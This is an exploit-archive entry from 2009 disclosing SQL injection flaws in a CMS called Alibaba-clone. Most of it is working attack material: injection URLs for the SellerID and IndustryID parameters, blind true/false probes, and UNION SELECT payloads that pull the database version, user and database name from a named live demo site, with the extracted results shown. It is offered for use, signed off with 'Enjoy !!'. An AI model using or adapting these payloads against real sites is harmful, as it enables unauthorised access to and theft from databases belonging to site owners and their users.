[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Alibaba-clone CMS (SQL/bSQL) Remote SQL Injection Vulnerabilities
# Published : 2009-07-20
# Author : 599eme Man
# Previous Title : MCshoutbox 1.1 (SQL/XSS/Shell) Multiple Remote Vulnerabilities
# Next Title : E-Xoopport 3.1 Module MyAnnonces (lid) SQL Injection Vulnerability
# [+] Alibaba-clone CMS (SQL/bSQL) Remote SQL Injection
# [+] Author : 599eme Man
# [+] Contact : Flouf@live.fr
# [+] Dowload : http://blog.duslerim.net/cms/alibabacom-clone-new.html
# [+] Big Thanks to: Moudi :)
>> [+] Exploit :
http://www.site.com/path/supplier/view_contact_details.php?SellerID=(Blind) or (SQL)
http://www.site.com/path/category.php?IndustryID=(Blind) or (SQL)
>> [+] Demo BLIND:
http://www.webdevelopmenthouse.com/alibaba-clone/category.php?IndustryID=25 and 1=1 <= true
http://www.webdevelopmenthouse.com/alibaba-clone/category.php?IndustryID=25 and 1=2 <= false
http://www.webdevelopmenthouse.com/alibaba-clone/category.php?IndustryID=25 and 1=1+AND+SUBSTRING(@@version,1,1)=5 <= true
http://www.webdevelopmenthouse.com/alibaba-clone/category.php?IndustryID=25 and 1=1+AND+SUBSTRING(@@version,1,1)=4 <= false
The MYSQL version is : 5
http://www.webdevelopmenthouse.com/alibaba-clone/category.php?IndustryID=25+and+1=1+union+select+1,2,version()--
See now: 5.0.45-community-nt
http://www.webdevelopmenthouse.com/alibaba-clone/category.php?IndustryID=25+and+1=1+union+select+1,2,user()--
Nadir_db@temp-webs
http://www.webdevelopmenthouse.com/alibaba-clone/category.php?IndustryID=25+and+1=1+union+select+1,2,database()--
nas04
>> [+] Demo SQL:
http://www.webdevelopmenthouse.com/alibaba-clone/category.php?IndustryID=18+union+select+1,2,version()--
The MYSQL version is : 5
http://www.webdevelopmenthouse.com/alibaba-clone/category.php?IndustryID=18+union+select+1,2,user()--
Nadir_db@temp-webs
http://www.webdevelopmenthouse.com/alibaba-clone/category.php?IndustryID=18+union+select+1,2,database()--
nas04
Enjoy !!
# www.Syue.com [2009-07-20]